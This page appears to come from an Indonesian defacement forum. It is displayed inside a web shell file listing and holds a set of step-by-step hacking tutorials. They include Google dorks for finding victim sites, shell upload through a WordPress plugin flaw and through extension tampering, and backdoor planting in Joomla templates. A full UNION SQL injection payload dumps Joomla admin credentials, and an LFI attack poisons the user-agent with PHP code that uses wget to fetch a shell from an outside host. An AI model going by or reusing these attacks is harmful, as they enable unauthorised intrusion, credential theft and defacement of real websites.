b374k
v10
today : | at : | safemode : ON
> / home / Defacer Forum Shear/Public_html/admin/index.php
name author perms com modified label

WordPress plugin tdo mini File Upload Vunerablity adam kristian rwxr-xr-x 0 06.18

Filename WordPress plugin tdo mini File Upload Vunerablity
Permission rw-r--r--
Author adam kristian
Date and Time 06.18
Label
Action



WordPress plugin tdo mini  File Upload Vunerablity

Google Dork: "inurl:"? Plugins / tjangan-mini-bentuk / tdomf-upload-inline.php tdomf_form_id = 1 "
 
pergi ke google.com dan masukkan ini dork "inurl:"? plugins / tjangan-mini-bentuk / tdomf-upload-inline.php tdomf_form_id = 1 "

sekarang melihat hasilnya dan pilih situs manapun


sekarang meng-upload deface Anda sebagai deface.html, jpg dan upload shell Anda sebagai shell.asp,.. jpg atau shell.php;. jpg

dan lihat file upload Anda di sini ...
www.target.com/wp-content/uploads/tdomf/tmp/1/Yourfilehere


WebCruiser Web Vulnerability Scanner adam kristian rwxr-xr-x 0 06.17

Filename WebCruiser Web Vulnerability Scanner
Permission rw-r--r--
Author adam kristian
Date and Time 06.17
Label
Action


WebCruiser Web Vulnerability Scanner adalah sebuah perangkat lunak penetrasi web yang efektif dan kuat yang akan membantu kita dalam mengaudit website/situs, juga memiliki scanner kerentanan dan serangkaian alat keamanan.
WebCruiser Web Vulnerability Scanner
Mendukung pemindaian situs POC (Proof of concept) kerentanan situs seperti: SQL Injection, Cross Site Scripting, XPath Injection dll. juga, WebCruiser juga adalah sebuah alat SQL injection otomatis, XPath injection tool, dan Cross Site Scripting tool!

Apa itu WebCruiser? WebCruiser adalah alat untuk:
  • SQL Injection Tool pertama untuk Windows 7, Windows Vista. Tersedia juga untuk iPhone & iPad.
  • Web Vulnerability Scanner
  • SQL Injection Scanner
  • Cross Site Scripting Scanner
  • XPath Injection Scanner
  • Automatic SQL Injection Tool (POC)
  • Cross Site Scripting Tool (POC)
  • XPath Injection Tool (POC)
  • Post Data Resend Tool
Fitur Webcruiser:
  1. Crawler(Site Directori dan File)
  2. Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection dll.
  3. SQL Injection Scanner
  4. SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept)
  5. SQL Injection for SQL Server: PlainText/Union/Blind Injection
  6. SQL Injection for MySQL: PlainText/Union/Blind Injection
  7. SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection
  8. SQL Injection for DB2: Union/Blind Injection
  9. SQL Injection for Access: Union/Blind Injection
  10. Post Data Resend
  11. Cross Site Scripting Scanner and POC
  12. XPath Injection Scanner and POC
  13. Auto Get Cookie From Web Browser For Authentication
  14. Report Output.

Cara Tanem Backdoor di Joomla adam kristian rwxr-xr-x 0 06.17

Filename Cara Tanem Backdoor di Joomla
Permission rw-r--r--
Author adam kristian
Date and Time 06.17
Label
Action


Cara Tanem Backdoor di Joomla 

1.Masuk Ke Panel Admin Joomla
2.Pilih "Extensions" --> "Template Manager" Akan Keluar Tampilan Seperti SS dibawah
3.Pilih Salah Satu Template nya dan "EDIT" dan akan keluar tampilan seperti dibawah ini
4.Dari SS diatas Klik Menu "EDIT HTML"
5.Masukan Script Shell Kalian Di Kotak Besar yang saya tandai, Setelah itu Klik "APPLY" Lalu Klik "SAVE" Liat SS di Bawah ini

6. Dan Sheel Nya muncul disini "http://target.com/templates/nama_templates/index.php"


Semoga Membantu ^_^
Jangan Lupa Follow Ya Gan...

Selamat Mencoba

HACKING WEB DENGAN SYMLINK adam kristian rwxr-xr-x 0 06.16

Filename HACKING WEB DENGAN SYMLINK
Permission rw-r--r--
Author adam kristian
Date and Time 06.16
Label
Action


1.Upload Symlink nya melalui shell
Dan Symlink Sudah Saya Upload Melalui Shell
2.Buka Alamt Symlink Yang Kamu Upload.
3.Pilih "User & Domain & Symlink" Liat SS dibawah
4.Pilih Target dan Klik "Symlink" liat SS
5.Dan Pilih "wp-config.php" Liat SS
6.Cari Username Dan Password Database nya Liat SS
7.Connect'n Database Yang tadi Ke Shell Agan. Liat SS DiBawah ini

8.Dan Munculah Database namenya.Trus Agan Klik Database nya tersebut.
9.Didalam database nya agan pilih "wp_user"
10.Agan Edit Account Admin nya..Yang Harus Anda Ganti Ialah "Password"
Ingat Password nya harus berupa hash.biar lebih gampang agan encrypt password sesuka agan menggunakan md5 encrypt
http://devil4rt.us/hash.php
11.setelah agan ganti password nya trus agan login melalui admin lo


Selamat Mencoba ^_^

HACKING WEBSITE DENGAN TAMPER DATA adam kristian rwxr-xr-x 0 06.15

Filename HACKING WEBSITE DENGAN TAMPER DATA
Permission rw-r--r--
Author adam kristian
Date and Time 06.15
Label
Action


Mungkin banyak dari kita yang sudah tau apa itu webshell ? WebShell (PHP Shell), itu sebuah aplikasi berbasis php, yg dipake user untuk berinteraksi dengan server sistem. Kalo web shell, shell yg ditulis dalam bahasa pemrograman web (seperti R57, C99, dsb) untuk memudahkan eksplorasi terhadap suatu web yg memliki bug.

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau fasilitasnya hanya untuk upload file.jpg gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit

1. Siapakan dulu file shell.php seperti : shell

2.    Pilih salah satu shell
3. Rename dengan nama : shell.php.jpg
4. Install add ons Tamper Data dulu di browser mozilla kita :D
5. Restart dan kita mulai upload 

6. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan



6. Trus Uploads shell.php.jpg kita dan tamper :D



7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah :D



Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung .

Deface Web Berbasis Joomla Dengan Teknik “Exploit MyTube” adam kristian rwxr-xr-x 0 06.14

Filename Deface Web Berbasis Joomla Dengan Teknik “Exploit MyTube”
Permission rw-r--r--
Author adam kristian
Date and Time 06.14
Label
Action
Cara Hacking atau Deface Web Berbasis Joomla Dengan Teknik “Exploit MyTube”

Kali ini saya mau mebagi cara hacking yang mudah untuk diterapkan, namun dengan tingkat keberhasilan yang kecil. Sebenarnya ada banyak sekali cara dalam hacking web berbasis joomla ini. Apalagi dari daftar dork yang ada. Oke, langsung aja

Menemukan Target dan Exploit

Exploit adalah sebuah kode yang menyerang keamanan komputer secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Bisa juga dikatakan sebuah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.

Caranya cukup mudah, masuk ke google.com lalu paste inurl:”option=com_mytube” lalu tekan enter. Pilih salah satu website yang anda inginkan. Sudah? lanjut ke tahap yang berikutnya.

Misalkan alamat web yang telah anda dapatkan adalah http://alamattarget.com/index.php?option=com_mytube&Itemid=12 maka, tambahkan

    &view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+

    0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,

    0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+

    jos_users+where+id=62–

setelah angka 12 tadi, lalu tekan enter.

Jika sudah, maka akan tampil seperti berikut ini


















Di situ, kita bisa melihat admin dan email si admin. Oke, selanjutnya buka tab baru, masuk ke http://alamattarget.com/index.php?option=com_user&view=reset ini merupakan bentuk umum untuk me-reset password.

Kemudian masukan alamat email yang telah ditemukan tadi, lalu klik submit. Setelah itu, pindah ke tab awal, klik F5 untuk me-refresh page, lalu tulisan ea044f8847… akan berubah, inilh tokennya. Nah, jika menemukan tanda “$” setelah di refresh, maka teknik ini tidak bisa dijalankan dan anda harus mencari target lain. Jika sukses, maka lanjutkan ke tahap berikutnya.

Tahap berikutnya yaitu masuk ke login panel. Setelah memasukan token tadi, maka anda akan diminta memasukan password baru, disitulah anda memasukan password baru sesuai yang anda inginkan. setelah semua berjalan dengan lancar, maka yang harus anda lakukan adalah masuk ke http://alamattarget.com/administrator ini merupakan betuk umum dari login panel joomla.

Setelah itu, masuk ke Extensions >> Template Manager >> Default Template Name >> Edit HTML. Di bagian edit HTML ini, anda dapat memasukan kode deface, kemudian klik save, dan apply. Selesai.


HACKING WEB DENGAN METODE LFI adam kristian rwxr-xr-x 0 06.13

Filename HACKING WEB DENGAN METODE LFI
Permission rw-r--r--
Author adam kristian
Date and Time 06.13
Label
Action
Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas? sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja…

1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.

contoh : http://site.com/info.php?file=news.php

2. coba kita ganti “news.php” dengan “../../../”.

contoh : http://site.com/info.php?file=../../../

lalu kita mendapat error, seperti berikut…

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?
mari kita coba…

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”

contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika anda mendapatkan yang seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
lalu pada user-agent isikan dengan kode berikut :

<?system(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>

atau

<?exec(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>

lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

http://www.site.com/shell.php

happy hacking !
 

Jayalah Indonesiaku © 2010 DEFACER FORUM SHEAR
Mas Bro DX Template design by Tegal Cyber